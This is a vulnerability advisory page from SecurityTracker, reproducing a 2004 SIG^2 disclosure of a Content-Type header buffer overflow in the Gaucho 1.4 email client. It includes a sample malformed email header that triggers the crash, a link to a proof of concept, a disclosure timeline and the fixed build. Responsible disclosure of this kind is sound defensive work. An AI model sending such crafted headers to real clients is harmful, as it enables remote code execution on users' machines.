SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (E-mail Client)  >   Gaucho Vendors:   NakedSoft
Gaucho Buffer Overflow in Processing Mail Headers Via POP3 Lets Remote Servers Execute Arbitrary Code
SecurityTracker Alert ID:  1011032
SecurityTracker URL:  http://securitytracker.com/id/1011032
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Aug 23 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.4 Build 145
Description:   Tan Chew Keong of SIG^2 reported a vulnerability in the Gaucho e-mail client. A remote POP3 server can execute arbitrary code on a connected client.

It is reported that a POP3 server can send a specially crafted Content-Type e-mail header value to a connected Gaucho client to trigger a buffer overflow and execute arbitrary code.

A demonstration exploit header is provided:

Date: Mon, 09 Aug 2004 19:44:13 +0800
Subject: Testing
To: a@aaaaaa.xxx
From: XX <xx@xxxxxxxx.xxx.xx>
Message-ID: <GM109205179359A000.b76.xx@xxxxxxxx.xxx.xx>
MIME-Version: 1.0
Content-Type: AAAAAAAAAAAAA[approx. 280 chars]...; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Mailer: Gaucho Version 1.4.0 Build 145

A demonstration exploit is available at:

http://www.security.org.sg/vuln/gaucho140poc.cpp

The vendor was reportedly notified on August 10, 2004.

The original advisory is available at:

http://www.security.org.sg/vuln/gaucho140.html

Impact:   A remote server can execute arbitrary code on the target client when the client connects to the server.
Solution:   The vendor has issued a fixed version (1.4 Build 151), available at:

http://homepage1.nifty.com/nakedsoft/Gaucho/Gaucho14.html

Vendor URL:  homepage1.nifty.com/nakedsoft/Gaucho/Gaucho.html (Links to External Site)
Cause:   Input validation error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Gaucho 1.4 Email Client Buffer Overflow Vulnerability


SIG^2 Vulnerability Research Advisory

Gaucho 1.4 Email Client has Buffer Overflow Vulnerability when Receiving 
Email Headers with Abnormally Long Content-Type Field

by Tan Chew Keong
Release Date: 23 Aug 2004


ADVISORY URL

http://www.security.org.sg/vuln/gaucho140.html


SUMMARY

Gaucho (http://homepage1.nifty.com/nakedsoft/) is an Email client 
developed by NakedSoft for Microsoft Windows platforms. Gaucho supports 
SMTP, POP3 and other email delivery protocols. Gaucho version 1.4 Build 
145 is vulnerable to a buffer overflow when receiving malformed emails 
from a POP3 server. This vulnerability is triggered if Gaucho receives 
from the POP3 server, a specially crafted email that has an abnormally 
long string in the Content-Type field of the email header. This string 
will overwrite EIP via SEH, and can be exploited to execute arbitrary code.

 
TESTED SYSTEM

Gaucho 1.4 Build 145 on English Win2K SP4

 
DETAILS

Gaucho version 1.4 Build 145 is vulnerable to a buffer overflow that is 
triggered if Gaucho receives from the POP3 server, a specially crafted 
email that has an abnormally long string in the Content-Type field of 
the email header. This string will overwrite EIP via SEH, and can be 
exploited to execute arbitrary code. A sample email that will trigger 
the overflow is shown below.


Date: Mon, 09 Aug 2004 19:44:13 +0800
Subject: Testing
To: a@aaaaaa.xxx
From: XX <xx@xxxxxxxx.xxx.xx>
Message-ID: <GM109205179359A000.b76.xx@xxxxxxxx.xxx.xx>
MIME-Version: 1.0
Content-Type: AAAAAAAAAAAAA[approx. 280 chars]...; charset=US-ASCII
Content-Transfer-Encoding: 7bit
X-Mailer: Gaucho Version 1.4.0 Build 145


PATCH

Author has fixed the vulnerability in Version 1.4 Build 151. Users are 
advised to upgrade to the fixed version.  The patched build can be 
downloaded from the following link.
http://homepage1.nifty.com/nakedsoft/Gaucho/Gaucho14.html


PROOF-OF-CONCEPT

Proof-of-concept code to validate this vulnerability can be downloaded 
from this URL
http://www.security.org.sg/vuln/gaucho140poc.cpp

 
DISCLOSURE TIMELINE

09 Aug 04 - Vulnerability Discovered
10 Aug 04 - Initial Vendor Notification (no reply)
12 Aug 04 - Second Vendor Notification
14 Aug 04 - Author replied with fixed version
23 Aug 04 - Public Release


GREETINGS

All guys at SIG^2 G-TEC Lab
http://www.security.org.sg/webdocs/g-tec.html

"IT Security...the Gathering. By enthusiasts for enthusiasts."
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC